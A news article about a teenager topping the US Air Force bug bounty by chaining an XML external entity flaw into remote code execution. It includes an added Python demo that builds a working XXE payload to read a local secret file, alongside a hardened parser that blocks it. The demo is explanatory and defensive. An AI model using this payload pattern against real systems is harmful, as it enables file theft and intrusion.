Hackers are a major threat to the US government and its military. The US Air Force (USAF) was hacked by a 17-year-old high-school student who, instead of being punished, was paid. It was not a malicious attack: the teenager was taking part in the Air Force's bug bounty programme.
Jack Cable topped the Hack the Air Force programme by identifying 30 vulnerabilities, some of them critical, and reportedly took home a cash prize, with the Pentagon paying out between $100 (£77) and $5,000 for each vulnerability. Cable told IBTimes UK that the programme paid out a total of $130,000.
Unlike other bug bounty programmes, the USAF opened its event to hackers from outside the US. The Air Force said that 33 of the hackers who took part "came from outside the US," while two were active-duty US military personnel. The Air Force also confirmed that Cable earned "the largest bounty".
"I found what's known as an XML external entities vulnerability. That handles the application's processing of XML, which is a type of input data. I found that I could give it a URL and the application would make a request to that website. And I was able to escalate that, after working on it for a few hours, into a remote code execution. So that would allow me to basically do whatever I wanted. So I could access all the user data that was on the website and I could change anything that I wanted to," Cable told Marketplace.
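The first step Cable describes, an external entity declaration that makes the parser fetch whatever SYSTEM identifier the attacker supplies, is easy to reproduce. The following is an added example written for this article, not code from the Air Force programme or from Cable: it uses Python's standard-library xml.sax parser, which resolves external general entities only when the feature_external_ges flag is switched on (the default has been off since Python 3.7.1), reads a constructed local secret file through the entity, and then shows the same document against a hardened parser that keeps external entities off and refuses any DOCTYPE. The file name and its contents are constructed for the demo; a SYSTEM identifier of the form http://... would be fetched with urllib by the same code path, which is the outbound request Cable mentions.

```python
"""XML external entity (XXE) demo with Python's xml.sax: a constructed example
added to this article, not the Air Force's or Jack Cable's code."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class TextCollector(ContentHandler):
    """Collects character data, i.e. whatever the entities expand to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


class DTDRejector:
    """Lexical handler that aborts on any DOCTYPE, so no entity can be declared
    at all (this also blocks internal-entity expansion bombs)."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not allowed in untrusted XML")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_text(xml_bytes, resolve_external_entities):
    """Parse XML and return its text content.  With resolve_external_entities
    set, xml.sax opens the SYSTEM identifier of each referenced entity (a local
    path here; an http:// URL would be fetched with urllib) and splices the
    result into the document, which is the XXE behaviour."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def parse_untrusted(xml_bytes):
    """Hardened parser: external entities explicitly off and any DOCTYPE
    rejected before a single entity can be declared."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, DTDRejector())
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def is_rejected(xml_bytes):
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted(xml_bytes)
    except ValueError:
        return True
    return False


def xxe_payload(path):
    """Attacker-supplied document: declares an external entity pointing at
    `path` and references it inside element content."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{path}">]>'
        "<data>&xxe;</data>"
    ).encode()


def demo():
    """Run the payload against the vulnerable and the default parser.
    Returns (text leaked by the vulnerable parser, text from the default one)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")  # constructed secret, stands in for a real config file
        path = f.name
    try:
        payload = xxe_payload(path)
        leaked = parse_text(payload, resolve_external_entities=True)
        with_defaults = parse_text(payload, resolve_external_entities=False)
        return leaked, with_defaults
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser leaked:", leaked)
    print("default parser returned:", repr(safe))
```

Flipping a single parser feature is all that separates the two outcomes, which is why a hardened parser should state the safe setting explicitly rather than rely on a default, and why rejecting DOCTYPE outright is the simplest way to close the whole class in one place.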
The USAF bug bounty was reportedly run on the HackerOne platform and invited around 600 hackers from the US, Canada, the UK, Australia and New Zealand. All five nations are members of the Five Eyes intelligence alliance.
Cable also reported vulnerabilities in the India-based food app Zomato. In May, 17 million Zomato user accounts were put up for sale on the dark web, and shortly after the breach the restaurant-search app launched its own bug bounty programme.
Such programmes have gained popularity over the past few years, with the Tor Project recently launching its own. Tech giants such as Google, Twitter, Facebook and Apple have paid white-hat hackers substantial cash rewards for finding bugs and helping improve their security.
This article has been updated to include Jack Cable's comments. A previous version of the story incorrectly stated that the hackers who topped the bug bounty programme, including Cable, received hundreds of thousands of dollars in rewards.
After publication of the article, Cable reached out to IBTimes UK confirming that none of the hackers who participated in the programme made over $130,000. Cable also confirmed that he identified 30 vulnerabilities, although not all of them were critical.